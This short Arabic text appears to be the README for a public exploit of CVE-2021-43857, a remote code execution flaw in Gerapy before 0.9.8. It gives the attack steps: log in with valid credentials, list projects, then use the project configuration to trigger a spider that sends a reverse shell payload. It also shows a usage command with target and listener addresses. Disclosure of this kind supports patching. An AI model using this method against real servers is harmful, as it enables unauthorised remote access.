
Gerapy قبل الإصدار 0.9.8 معرض لثغرة تنفيذ التعليمات البرمجية عن بُعد. تم إصلاح هذه المشكلة في الإصدار 0.9.8.
Gerapy قبل الإصدار 0.9.8 معرّض لتنفيذ التعليمات البرمجية عن بُعد. تم إصلاح هذه المشكلة في الإصدار 0.9.8.
CVE-2021-43857 هي ثغرة أمنية مصنفة بأولوية حرجة (CVSS 9.8) تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد.
تعمل هذه الثغرة على جميع الإصدارات السابقة للإصدار 0.9.8.
تم اختبارها فقط على الإصدار 0.9.6. تتطلب بيانات اعتماد صحيحة.
يعمل الاستغلال عن طريق تسجيل الدخول إلى التطبيق، ثم الحصول على قائمة المشاريع المنشأة (سيفشل إذا لم يكن هناك أي مشروع)، ثم استخدام إعدادات المشروع لتشغيل آلية spider المعرّضة للخطر عن طريق إرسال حمولة reverse shell.
مثال على الاستخدام:
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
